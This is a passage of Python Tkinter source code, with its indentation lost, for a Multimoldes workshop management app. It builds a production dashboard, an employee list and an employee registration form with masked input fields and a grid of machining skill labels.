#Configurando Imagem da Logo Multimoldes na aba Cadastro
image = PhotoImage(file='image/logo-multimoldes.png')
self.logo = Label(self.aba3, image=image, bg='white')
self.logo.pack()
self.aba_principal()
self.aba_funcionarios()
self.aba_cadastro()
self.aba_ordem_de_servico()
self.janelaInicial.protocol('WM_DELETE_WINDOW', self.sair)
self.janelaInicial.mainloop()
#Abas com as funcionalidades do programa
def aba_principal(self):
#Labels de indicação
linfo1 = Label(self.aba1, text='Itens produzidos', font=('arial', 14), bg='white', fg='black')
linfo1.place(relx=0.100, rely=0.055)
ldados1 = Label(self.aba1, font=('arial', 20), bg='white', fg='#45ccce')
ldados1.place(relx=0.220, rely=0.045)
try:
self.dataHoje = str(datetime.now().date())
self.cursor.execute("SELECT DISTINCT peca FROM ordem_processo WHERE DataFinalizada LIKE '%"+self.dataHoje+"%' AND Estado = 'fechada'")
self.pecas = self.cursor.fetchall()
forma = ''
for v in self.pecas:
forma += str(v[0])+','
c = len(forma)
c -= 1
forma = forma[:c]
self.cursor.execute("SELECT DISTINCT peca FROM ordem_processo WHERE Peca IN ("+forma+") AND Estado <> 'fechada' AND DataFinalizada LIKE '%"+self.dataHoje+"%'")
a = self.cursor.fetchall()
if a != []:
a = a[0]
forma = ''
for v in a:
forma += str(v)+','
c = len(forma)
c -= 1
forma = forma[:c]
self.cursor.execute("SELECT count(DISTINCT peca) FROM ordem_processo WHERE Peca NOT IN ("+forma+") AND Estado = 'fechada' AND DataFinalizada LIKE '%"+self.dataHoje+"%'")
a = self.cursor.fetchall()[0]
else:
self.cursor.execute("SELECT COUNT(DISTINCT peca) FROM ordem_processo WHERE Peca IN ("+forma+") AND Estado = 'fechada' AND DataFinalizada LIKE '%"+self.dataHoje+"%'")
a = self.cursor.fetchall()[0]
ldados1['text'] = a[0]
except Exception as erro:
print(f'{erro}, {(erro.__class__)}')
pass
linfo2 = Label(self.aba1, text='Itens em andamento', font=('arial', 14), bg='white', fg='black')
linfo2.place(relx=0.320, rely=0.055)
linfo3 = Label(self.aba1, text='Itens retrabalhados', font=('arial', 14), bg='white', fg='black')
linfo3.place(relx=0.540, rely=0.055)
ldados3 = Label(self.aba1, font=('arial', 20), bg='white', fg='red')
ldados3.place(relx=0.680, rely=0.045)
try:
self.cursor.execute("SELECT COUNT(Tipo) FROM ordem_processo WHERE Tipo = 'Retrabalhar OS' AND Estado = 'fechada' AND DataFinalizada LIKE '%"+self.dataHoje+"%'")
ldados3['text'] = self.cursor.fetchall()[0][0]
except Exception as erro:
print(f'{erro}, {(erro.__class__)}')
pass
linfo4 = Label(self.aba1, text='Paradas de máquinas', font=('arial', 14), bg='white', fg='black')
linfo4.place(relx=0.760, rely=0.055)
ldados4 = Label(self.aba1, font=('arial', 20), bg='white', fg='orange')
ldados4.place(relx=0.920, rely=0.045)
try:
self.cursor.execute("SELECT COUNT(id) FROM pausas WHERE DataPause LIKE '%"+self.dataHoje+"%' ")
ldados4['text'] = self.cursor.fetchall()[0][0]
except:
pass
#Frame de Visualização de dados Os Finalizada
frameDetalhe1 = Frame(self.aba1, bg='white', highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=0)
frameDetalhe1.place(relx=0.010, rely=0.120, relwidth=0.450, relheight=0.400)
def buscar_dados():
a = C.itemcget(2, 'extent')
a = float(a)
b = int(a) - 1.0
C.itemconfig(2, extent=b) #fazendo a barra progredir no sentido horário
inteiro = int(b * (-1)) #atribuindo o valor do grau convertendo-o para positivo e inteiro
porc = str(round(((inteiro / 360) * 100),2)) #arredodando o grau e convertendo para porcentagem
C.itemconfig(4, text=porc+'%') #exibindo resultado
frameDetalhe1.after(100, buscar_dados)
C = Canvas(frameDetalhe1, bg="white")
circle1 = 0, 0, 200, 200
oval1 = C.create_oval(circle1, outline='#e6e6e6', fill="#e6e6e6")
C.move(oval1, 10,10)
coord = 0, 0, 200, 200
arc = C.create_arc(coord, start=90, extent=0, outline='#45ccce', fill="#45ccce")
C.move(arc, 10, 10)
circle = 0, 0, 150, 150
oval = C.create_oval(circle, outline='white', fill="white")
C.move(oval, 35,35)
textPrincipal = C.create_text(110, 110, font="Arial 22")
textLabel = C.create_text(110, 110, text="Qtd Finalizada", font="Arial 12")
C.move(textLabel, 270,-30)
textTotal = C.create_text(110, 110, text="795", font="Arial 30", fill='#45ccce')
C.move(textTotal, 270,10)
textLabel2 = C.create_text(110, 110, text="Operações", font="Arial 12")
C.move(textLabel2, 270, 40)
C.place(relx=0.500, rely=0.500, anchor='center', relwidth=0.800, relheight=0.780)
buscar_dados()
#Labels Informativos de dados do Frame de Visualização de Os Finalizada
corPadrao = self.janelaInicial['bg']
#Frame de Visualização de dados Os Pausadas
frameDetalhe2 = Frame(self.aba1, bg='white', highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=0)
frameDetalhe2.place(relx=0.520, rely=0.120, relwidth=0.450, relheight=0.400)
def buscar_dados2():
a = C2.itemcget(2, 'extent')
a = float(a)
b = int(a) - 1.0
C2.itemconfig(2, extent=b) #fazendo a barra progredir no sentido horário
inteiro = int(b * (-1)) #atribuindo o valor do grau convertendo-o para positivo e inteiro
porc = str(round(((inteiro / 360) * 100),2)) #arredodando o grau e convertendo para porcentagem
C2.itemconfig(4, text=porc+'%') #exibindo resultado
frameDetalhe2.after(100, buscar_dados2)
C2 = Canvas(frameDetalhe2, bg="white")
varCircle1 = 0, 0, 200, 200
varOval1 = C2.create_oval(varCircle1, outline='#e6e6e6', fill="#e6e6e6")
C2.move(varOval1, 10,10)
coord = 0, 0, 200, 200
varArc = C2.create_arc(coord, start=90, extent=0, outline='yellow', fill="yellow")
C2.move(varArc, 10, 10)
varCircle = 0, 0, 150, 150
oval = C2.create_oval(varCircle, outline='white', fill="white")
C2.move(oval, 35,35)
varTextPrincipal = C2.create_text(110, 110, font="Arial 22")
varTextLabel = C2.create_text(110, 110, text="Qtd Pausada", font="Arial 12")
C2.move(varTextLabel, 270,-30)
varTextTotal = C2.create_text(110, 110, text="795", font="Arial 30", fill="yellow")
C2.move(varTextTotal, 270,10)
varTextLabel2 = C2.create_text(110, 110, text="Operações", font="Arial 12")
C2.move(varTextLabel2, 270, 40)
C2.place(relx=0.500, rely=0.500, anchor='center', relwidth=0.800, relheight=0.780)
buscar_dados2()
#Formatando estilo de Tree view
#style = ttk.Style()
#style.configure('Treeview.Heading', font=('arial', 9), foreground='#344f84')
#Criando Treeview para visualização dos dados de OS Finalizados
C3 = Canvas(self.aba1, bg="white")
textTitleC3 = C3.create_text(0, 0, text="Ranking de Operadores", font="Arial 10")
C3.move(textTitleC3, 80,20)
line1 = C3.create_rectangle(300, 5, 00, 00, fill='#f65d66', outline='#f65d66', width=2)
x1 = 0
y1 = 50
C3.move(line1, x1,y1)
tx = int(C3.coords(2)[2])
textLabelC3 = C3.create_text(0, 0, text="100%", font="Arial 10")
C3.move(textLabelC3, tx+x1+20,y1)
line2 = C3.create_rectangle(300, 5, 00, 00, fill='#f65d66', outline='#f65d66', width=2)
C3.move(line2, 0,80)
line3 = C3.create_rectangle(300, 5, 00, 00, fill='#f65d66', outline='#f65d66', width=2)
C3.move(line3, 0,110)
line4 = C3.create_rectangle(300, 5, 00, 00, fill='#f65d66', outline='#f65d66', width=2)
C3.move(line4, 0,140)
line5 = C3.create_rectangle(300, 5, 00, 00, fill='#f65d66', outline='#f65d66', width=2)
C3.move(line5, 0,170)
line6 = C3.create_rectangle(300, 5, 00, 00, fill='#f65d66', outline='#f65d66', width=2)
C3.move(line6, 0,200)
line7 = C3.create_rectangle(300, 5, 00, 00, fill='#f65d66', outline='#f65d66', width=2)
C3.move(line7, 0,230)
lineDiv = C3.create_line(0, 150, 0, 0, width=2, fill='#e6e6e6')
C3.move(lineDiv, 370,70)
textNome1 = C3.create_text(0, 0, text="Marcos", font="Arial 10")
C3.move(textNome1,450,50)
C3.place(relx=0.250, rely=0.700, anchor='center', relwidth=0.400, relheight=0.350)
def aba_funcionarios(self):
global image
#Frame 1 que exibirá os funcionários
self.frameFuncionarios = Frame(self.aba2, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=2, bg='white')
self.frameFuncionarios.place(relx=0.040, rely=0.040, relwidth=0.650, relheight=0.930)
#Imagem Logo da Empresa
image = PhotoImage(file='image/logo-multimoldes.png')
logo = Label(self.frameFuncionarios, image=image, bg='white')
logo.pack()
lb1 = Label(self.frameFuncionarios, text='Total Funci', font=('arial black', 11, 'bold'), fg='#4c78ff', bg='white')
lb1.place(relx=0.010, rely=0.010)
self.lbFunc = Label(self.frameFuncionarios, text='0', font=('arial black', 11, 'bold'), fg='green', bg='white')
self.lbFunc.place(relx=0.140, rely=0.010)
valido = 0
if self.bancoConnect:
self.atualiza_valores_funcionario()
#Tree view onde exibirá os funcionários
self.viewFuncionarios = ttk.Treeview(self.frameFuncionarios, column=('1','2','3','4'), show='headings')
self.viewFuncionarios.heading('1', text='ID')
self.viewFuncionarios.heading('2', text='Nome')
self.viewFuncionarios.heading('3', text='Cargo')
self.viewFuncionarios.heading('4', text='CPF')
self.viewFuncionarios.column("1", width=-90, anchor='n')
self.viewFuncionarios.column("2", width=120, anchor='n')
self.viewFuncionarios.column("3", width=30, anchor='n')
self.viewFuncionarios.column("4", width=30, anchor='n')
self.viewFuncionarios.place(relx=0.0, rely=0.300, relwidth=0.961, relheight=0.700)
self.viewFuncionarios.bind('<Double -1>', self.exibir_perfil_funcionarios)
self.viewFuncionarios.bind('<Return>', self.exibir_perfil_funcionarios)
self.viewFuncionarios.bind("<Escape>", lambda event: self.remover_focus(event, self.viewFuncionarios))
scrollbar = Scrollbar(self.frameFuncionarios, orient="vertical", command=self.viewFuncionarios)
self.viewFuncionarios.configure(yscrollcommand=scrollbar.set)
scrollbar.place(relx=0.960, rely=0.300, relwidth=0.040, relheight=0.700)
#Chamando função para exibir os funcionários cadastrados
self.exibir_funcionarios('funcionarios')
#Frame 2 que mostrará os dados dos funcionários
self.framePerfil = Frame(self.aba2, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=2, bg='white')
self.framePerfil.place(relx=0.750, rely=0.040, relwidth=0.200, relheight=0.930)
self.imgPerfil = PhotoImage(file='image/sem_perfil.png')
self.lbPerfil = Label(self.framePerfil, image=self.imgPerfil, bg='white', relief=FLAT)
self.lbPerfil.place(relx=0.320, rely=0.040)
global imgEditar
imgEditar = PhotoImage(file='image/editar.png')
buttonEditar = Button(self.framePerfil, image=imgEditar, bg='white', relief=FLAT, border=0, activebackground='white', command=self.editar_perfil_funcionario)
buttonEditar.place(relx=0.040, rely=0.070)
global imgExcluir
imgExcluir = PhotoImage(file='image/excluir.png')
buttonExcluir = Button(self.framePerfil, image=imgExcluir, bg='white', relief=FLAT, border=0, activebackground='white', command=self.deletar_perfil_funcionario)
buttonExcluir.place(relx=0.040, rely=0.135)
global imgLimpar
imgLimpar = PhotoImage(file='image/limpar2.png')
buttonLimpar = Button(self.framePerfil, image=imgLimpar, bg='white', relief=FLAT, border=0, activebackground='white', command=self.limpar_perfil_funcionario)
buttonLimpar.place(relx=0.040, rely=0.200)
#Label aviso
self.labelAviso = Label(self.framePerfil, text='''
Selecione um Perfil
para exibir
os seus Dados''', justify=CENTER, anchor='w', bg='white', font=('arial', 11))
self.labelAviso.place(relx=0.150, rely=0.400)
#Label dados pessoais
self.lNome = Label(self.framePerfil, font=('arial black', 10, 'bold'), justify=CENTER, fg='#4c78ff', bg='white')
self.lIdade = Label(self.framePerfil, font=('arial black', 10, 'bold'), justify=CENTER, fg='#4c78ff', bg='white')
self.lFone = Label(self.framePerfil, font=('arial black', 10, 'bold'), justify=CENTER, fg='#4c78ff', bg='white')
#Label totalizando OS's Concluídas e Pendentes
self.l_OS_Con = Label(self.framePerfil, text='OS Concluídas', font=('arial black', 9), fg='#4c78ff', bg='white')
self.l_OS_Pen = Label(self.framePerfil, text='OS Pendentes', font=('arial black', 9), fg='#4c78ff', bg='white')
self.l_OS_Dados1 = Label(self.framePerfil, font=('arial black', 9), fg='green', bg='white')
self.l_OS_Dados2 = Label(self.framePerfil, font=('arial black', 9), fg='red', bg='white')
self.botVer = Button(self.framePerfil, text='Ver Habilidade', font=('arial black', 10), fg='white', bg='#4c78ff', border=1, relief=SOLID, command=self.exibir_habilidade)
def aba_cadastro(self):
#Frame de Login dos registros de conta do usuário
self.frameDadosLogin = Frame(self.aba3, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=2, bg='white')
self.frameDadosLogin.place(relx=0.100, rely=0.150, relwidth=0.800, relheight=0.270)
#Label de inserção de foto do Funcionário
self.imgSemPerfil = PhotoImage(file='image/sem_perfil.png')
self.foto = Label(self.frameDadosLogin, image=self.imgSemPerfil, width=150, height=150, bg='white')
self.foto.place(relx=0.830, rely=0.060)
self.arquivoIMG = 'image/sem_perfil.png'
def selecionar_imagem():
#Abrindo arquivo de imagem para foto de perfil
self.caminhoBackup = self.arquivoIMG
self.arquivoIMG = filedialog.askopenfilename(title='Selecione imagem de perfil', filetypes=(('Imagem PNG', '*.png'), ('All files', '*.*')))
#Se for zero nenhuma foto foi selecionada
if len(self.arquivoIMG) == 0:
#Tentando verificar se existe cookie de imagem
try:
self.foto['image'] = self.cookie
self.arquivoIMG = self.caminhoBackup
except: pass
return ''
#Armazenando a foto selecionada.
self.imgSelecionada = PhotoImage(file=self.arquivoIMG)
#Verificando se imagem não excede o comprimento máximo permitido
if self.imgSelecionada.width() > 150 or self.imgSelecionada.height() > 150:
return messagebox.showinfo('Tamanho não permitido', 'A imagem selecionada possui comprimento grande demais')
self.cookie = self.imgSelecionada
#Configurando Labels parar exibir imagem de selecionar e botão de editar
self.foto['image'] = self.imgSelecionada
self.imgAdd = PhotoImage(file='image/lapis.png')
self.add['image'] = self.imgAdd
self.add.place(relx=0.955, rely=0.700)
self.imgAdd = PhotoImage(file='image/abrir.png')
self.add = Button(self.frameDadosLogin, image=self.imgAdd, bg='white', relief=FLAT, activebackground='white', border=0, command=selecionar_imagem)
self.add.place(relx=0.890, rely=0.580)
#labels referente aos campos de login
self.lbDados = Label(self.frameDadosLogin, text='Dados', font=('arial black', 14), bg='white', fg='#4c78ff')
self.lbDados.place(relx=0.010, rely=0.010)
self.lbNome = Label(self.frameDadosLogin, text='Nome', font=('arial',12, 'bold'), bg='white', fg='#4c78ff')
self.lbCPF = Label(self.frameDadosLogin, text='CPF', font=('arial',12, 'bold'), bg='white', fg='#4c78ff')
self.lbFuncao = Label(self.frameDadosLogin, text='Função', font=('arial',12, 'bold'), bg='white', fg='#4c78ff')
self.lbFone = Label(self.frameDadosLogin, text='Fone', font=('arial',12, 'bold'), bg='white', fg='#4c78ff')
self.lbNasc = Label(self.frameDadosLogin, text='Data de Nasc.', font=('arial',12, 'bold'), bg='white', fg='#4c78ff')
self.lbSenha = Label(self.frameDadosLogin, text='Senha', font=('arial',12, 'bold'), bg='white', fg='#4c78ff')
self.lbSenhaErro = Label(self.frameDadosLogin, text='', font=('arial', 10, 'bold'), fg='red', bg='white')
self.lbConfirmaSenha = Label(self.frameDadosLogin, text='Confirme Senha', font=('arial',12, 'bold'), bg='white', fg='#4c78ff')
self.lbConfirmaSenhaErro = Label(self.frameDadosLogin, text='', font=('arial', 10, 'bold'), fg='red', bg='white')
self.lbNome.place(relx=0.020, rely=0.220)
self.lbCPF.place(relx=0.470, rely=0.220)
self.lbFuncao.place(relx=0.020, rely=0.450)
self.lbFone.place(relx=0.300, rely=0.450)
self.lbNasc.place(relx=0.570, rely=0.450)
self.lbSenha.place(relx=0.020, rely=0.700)
self.lbSenhaErro.place(relx=0.110, rely=0.750)
self.lbConfirmaSenha.place(relx=0.300, rely=0.700)
self.lbConfirmaSenhaErro.place(relx=0.440, rely=0.750)
#Função que impedirá que o usuário digite valores diferentes do que o campos propõe
def verifica_campo(*args):
value = strNome.get()
if len(value) > 0:
if value[-1].isnumeric():
strNome.set(value[:-1])
else:
strNome.set(value[:50])
value2 = nCPF.get()
if len(value2) > 0:
if not value2[-1].isnumeric():
nCPF.set(value2[:-1])
else:
nCPF.set(value2[:11])
value3 = nSenha.get()
if len(value3) > 0:
if not value3[-1].isnumeric():
nSenha.set(value3[:-1])
else:
nSenha.set(value3[0:8])
if len(value3) >= 8:
self.campoConfirmaSenha.configure(state=NORMAL)
else:
self.campoConfirmaSenha.configure(state=DISABLED)
else:
self.lbConfirmaSenhaErro['text'] = ''
self.campoConfirmaSenha.configure(state=DISABLED)
value4 = nConfirmaSenha.get()
if len(value4) > 0:
if len(value4) == 8 and value4 != value3:
self.lbConfirmaSenhaErro['text'] = 'As senhas não coincidem'
elif len(value4) == 8 and value4 == value3:
self.lbConfirmaSenhaErro['text'] = ''
if not value4[-1].isnumeric():
nConfirmaSenha.set(value4[:-1])
else:
nConfirmaSenha.set(value4[:8])
else:
self.lbConfirmaSenhaErro['text'] = ''
def format_campo_fone(*args):
mask = nFone.get()
nFone.set(mask[:15])
#Se houver 2 dígitos no campo, e eles forem númericos...
if len(mask) == 2 and mask.isnumeric():
#Delete todo o campo
self.campoFone.delete(0, END)
#E acrescente parênteses com o valor obtido dentro
self.campoFone.insert(END,'('+mask+')')
#Se houver 9 dígitos no campo, e os últimos 4 forem númericos...
if len(mask) == 9 and mask[4:].isnumeric():
#Delete todo o campo
self.campoFone.delete(0, END)
#pegue os primeiros quatro dígitos e acrescente um espaço no final
a = mask[0:4]+' '
#com os primeiros dígitos acrescentado com o espaço, concatene com o resto
a = a+mask[4:]
#Devolvendo o valor ajustado para a variável principal
mask = a
#Insira no campo os números com a máscara pronta
self.campoFone.insert(END, mask+'-')
def format_campo_nasc(*args):
mask = nNasc.get()
nNasc.set(mask[:10])
#Se houver 2 dígitos no campo, e eles forem númericos...
if len(mask) == 2 and mask.isnumeric():
#Delete todo o campo
self.campoNasc.delete(0, END)
#E acrescente parênteses com o valor obtido dentro
self.campoNasc.insert(END, mask+'/')
elif len(mask) == 5 and mask[3:].isnumeric():
#Delete todo o campo
self.campoNasc.delete(0, END)
#E acrescente parênteses com o valor obtido dentro
self.campoNasc.insert(END, mask+'/')
#Variáveis que será utilizadas para verificação dos campos
strNome = StringVar()
strNome.trace('w', verifica_campo)
nCPF = StringVar()
nCPF.trace('w', verifica_campo)
nFone = StringVar()
nFone.trace('w', format_campo_fone)
nNasc = StringVar()
nNasc.trace('w', format_campo_nasc)
nSenha = StringVar()
nSenha.trace('w', verifica_campo)
nConfirmaSenha = StringVar()
nConfirmaSenha.trace('w', verifica_campo)
#Campos de preenchimento dos dados de login
self.campoNome = Entry(self.frameDadosLogin, font=('arial',12), textvariable=strNome, border=2, relief=GROOVE)
self.campoNome.focus_force()
self.campoCPF = Entry(self.frameDadosLogin, font=('arial',12), textvariable=nCPF, border=2, relief=GROOVE)
self.campoFuncao = ttk.Combobox(self.frameDadosLogin, font=('arial',12), state='readonly')
self.campoFuncao['values'] = ('Selecione', 'Frezador', 'Soldador', 'Torneiro', 'Caldereiro', 'Tec. Usinagem', 'Operador CNC', 'Operador/Programador CNC', 'Tec. em Mecânica', 'Desenhista', 'Eletrotécnica')
self.campoFuncao.current(0)
self.campoFone = Entry(self.frameDadosLogin, font=('arial',12), textvariable=nFone, border=2, relief=GROOVE)
self.campoNasc = Entry(self.frameDadosLogin, font=('arial',12), textvariable=nNasc, border=2, relief=GROOVE)
self.campoSenha = Entry(self.frameDadosLogin, font=('arial',12), show='*', textvariable=nSenha, border=2, relief=GROOVE)
self.campoConfirmaSenha = Entry(self.frameDadosLogin, font=('arial',12), show='*', textvariable=nConfirmaSenha,state=DISABLED, border=2, relief=GROOVE)
self.campoNome.place(relx=0.080, rely=0.220, relwidth=0.350)
self.campoCPF.place(relx=0.518, rely=0.220, relwidth=0.175)
self.campoFuncao.place(relx=0.080, rely=0.450)
self.campoFone.place(relx=0.350, rely=0.450)
self.campoNasc.place(relx=0.680, rely=0.450, relwidth=0.130)
self.campoSenha.place(relx=0.085, rely=0.700, relwidth=0.175)
self.campoConfirmaSenha.place(relx=0.430, rely=0.700, relwidth=0.175)
def mostrar_senha():
if self.senhaVisible == False:
self.campoSenha['show'] = ''
self.campoConfirmaSenha['show'] = ''
self.senhaVisible = True
self.cadeado = PhotoImage(file='image/cadeado_aberto.png')
self.check['image'] = self.cadeado
else:
self.campoSenha['show'] = '*'
self.campoConfirmaSenha['show'] = '*'
self.senhaVisible = False
self.cadeado = PhotoImage(file='image/cadeado.png')
self.check['image'] = self.cadeado
self.senhaVisible = False
self.cadeado = PhotoImage(file='image/cadeado.png')
self.check = Button(self.frameDadosLogin, image=self.cadeado, bg='white', activebackground='white', border=0, command=mostrar_senha)
self.check.place(relx=0.620, rely=0.680)
#Frame de atribuição das habilidades dos funcionários
self.frameAtribuicao = Frame(self.aba3, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=2, bg='white')
self.frameAtribuicao.place(relx=0.100, rely=0.450, relwidth=0.800, relheight=0.430)
#labels referente aos campos de Atribuição
self.lbAtribuicao = Label(self.frameAtribuicao, text='Competência ', font=('arial black', 14), bg='white', fg='#4c78ff')
self.lbAtribuicao.place(relx=0.010, rely=0.010)
self.lbAtribuicao1 = Label(self.frameAtribuicao, text='Desenhar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao2 = Label(self.frameAtribuicao, text='Revisar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao3 = Label(self.frameAtribuicao, text='Serrar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao4 = Label(self.frameAtribuicao, text='Furar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao5 = Label(self.frameAtribuicao, text='Estampar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao6 = Label(self.frameAtribuicao, text='Prensar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao7 = Label(self.frameAtribuicao, text='Rosquear', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao8 = Label(self.frameAtribuicao, text='Tornear 1º', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao9 = Label(self.frameAtribuicao, text='Tornear 2º', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao10 = Label(self.frameAtribuicao, text='Tornear Única', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao11 = Label(self.frameAtribuicao, text='Fresar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao12 = Label(self.frameAtribuicao, text='Retificar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao13 = Label(self.frameAtribuicao, text='Erosão Penetração', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao14 = Label(self.frameAtribuicao, text='Erosão Fio', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao15 = Label(self.frameAtribuicao, text='Tratamento Térmico', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao16 = Label(self.frameAtribuicao, text='Oxidação Negra', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao17 = Label(self.frameAtribuicao, text='Solda', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao18 = Label(self.frameAtribuicao, text='Solda Ponto', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao19 = Label(self.frameAtribuicao, text='Solda Indução', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao20 = Label(self.frameAtribuicao, text='Lixar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao21 = Label(self.frameAtribuicao, text='Esmerilhar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao22 = Label(self.frameAtribuicao, text='Jatear', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao23 = Label(self.frameAtribuicao, text='Polir', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao24 = Label(self.frameAtribuicao, text='Lavar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao25 = Label(self.frameAtribuicao, text='Embalar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao26 = Label(self.frameAtribuicao, text='Medir', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao27 = Label(self.frameAtribuicao, text='Rebarbar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao28 = Label(self.frameAtribuicao, text='Rosquear Manualmente', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao29 = Label(self.frameAtribuicao, text='Pintar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao30 = Label(self.frameAtribuicao, text='Montar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao31 = Label(self.frameAtribuicao, text='Escarear', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao32 = Label(self.frameAtribuicao, text='Afiar Ferramenta', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao33 = Label(self.frameAtribuicao, text='Dobrar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao34 = Label(self.frameAtribuicao, text='Chanfrar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao35 = Label(self.frameAtribuicao, text='Soldar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao36 = Label(self.frameAtribuicao, text='Cortar c/lixadeira', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao37 = Label(self.frameAtribuicao, text='Cortar c/maçarico', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao38 = Label(self.frameAtribuicao, text='Aquecer com Maçarico', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao39 = Label(self.frameAtribuicao, text='Temperar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao40 = Label(self.frameAtribuicao, text='Revenir', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao41 = Label(self.frameAtribuicao, text='Desempenar', font=('arial', 10, 'bold'), bg='white', fg='#4c78ff')
self.lbAtribuicao1.place(relx=0.020, rely=0.130, relwidth=0.160)
self.lbAtribuicao2.place(relx=0.260, rely=0.130, relwidth=0.160)
self.lbAtribuicao3.place(relx=0.510, rely=0.130, relwidth=0.160)
self.lbAtribuicao4.place(relx=0.760, rely=0.130, relwidth=0.160)
self.lbAtribuicao5.place(relx=0.020, rely=0.210, relwidth=0.160)
self.lbAtribuicao6.place(relx=0.260, rely=0.210, relwidth=0.160)
self.lbAtribuicao7.place(relx=0.510, rely=0.210, relwidth=0.160)
self.lbAtribuicao8.place(relx=0.760, rely=0.210, relwidth=0.160)
self.lbAtribuicao9.place(relx=0.020, rely=0.290, relwidth=0.160)
self.lbAtribuicao10.place(relx=0.260, rely=0.290, relwidth=0.160)
self.lbAtribuicao11.place(relx=0.510, rely=0.290, relwidth=0.160)
self.lbAtribuicao12.place(relx=0.760, rely=0.290, relwidth=0.160)
self.lbAtribuicao13.place(relx=0.020, rely=0.370, relwidth=0.160)
self.lbAtribuicao14.place(relx=0.260, rely=0.370, relwidth=0.160)
self.lbAtribuicao15.place(relx=0.510, rely=0.370, relwidth=0.160)
self.lbAtribuicao16.place(relx=0.760, rely=0.370, relwidth=0.160)
self.lbAtribuicao17.place(relx=0.020, rely=0.450, relwidth=0.160)
self.lbAtribuicao18.place(relx=0.260, rely=0.450, relwidth=0.160)
self.lbAtribuicao19.place(relx=0.510, rely=0.450, relwidth=0.160)
self.lbAtribuicao20.place(relx=0.760, rely=0.450, relwidth=0.160)
self.lbAtribuicao21.place(relx=0.020, rely=0.530, relwidth=0.160)
self.lbAtribuicao22.place(relx=0.260, rely=0.530, relwidth=0.160)
self.lbAtribuicao23.place(relx=0.510, rely=0.530, relwidth=0.160)
self.lbAtribuicao24.place(relx=0.760, rely=0.530, relwidth=0.160)
self.lbAtribuicao25.place(relx=0.020, rely=0.610, relwidth=0.160)
self.lbAtribuicao26.place(relx=0.260, rely=0.610, relwidth=0.160)
self.lbAtribuicao27.place(relx=0.510, rely=0.610, relwidth=0.160)
self.lbAtribuicao28.place(relx=0.760, rely=0.610, relwidth=0.160)
self.lbAtribuicao29.place(relx=0.020, rely=0.690, relwidth=0.160)
self.lbAtribuicao30.place(relx=0.260, rely=0.690, relwidth=0.160)
self.lbAtribuicao31.place(relx=0.510, rely=0.690, relwidth=0.160)
self.lbAtribuicao32.place(relx=0.760, rely=0.690, relwidth=0.160)
self.lbAtribuicao33.place(relx=0.020, rely=0.770, relwidth=0.160)
self.lbAtribuicao34.place(relx=0.260, rely=0.770, relwidth=0.160)
self.lbAtribuicao35.place(relx=0.510, rely=0.770, relwidth=0.160)
self.lbAtribuicao36.place(relx=0.760, rely=0.770, relwidth=0.160)
self.lbAtribuicao37.place(relx=0.020, rely=0.850, relwidth=0.160)
self.lbAtribuicao38.place(relx=0.260, rely=0.850, relwidth=0.160)
self.lbAtribuicao39.place(relx=0.510, rely=0.850, relwidth=0.160)
self.lbAtribuicao40.place(relx=0.760, rely=0.850, relwidth=0.160)
self.lbAtribuicao41.place(relx=0.020, rely=0.930, relwidth=0.160)
#Boxes de seleção para o nível de habilidades do usuário em cada operação
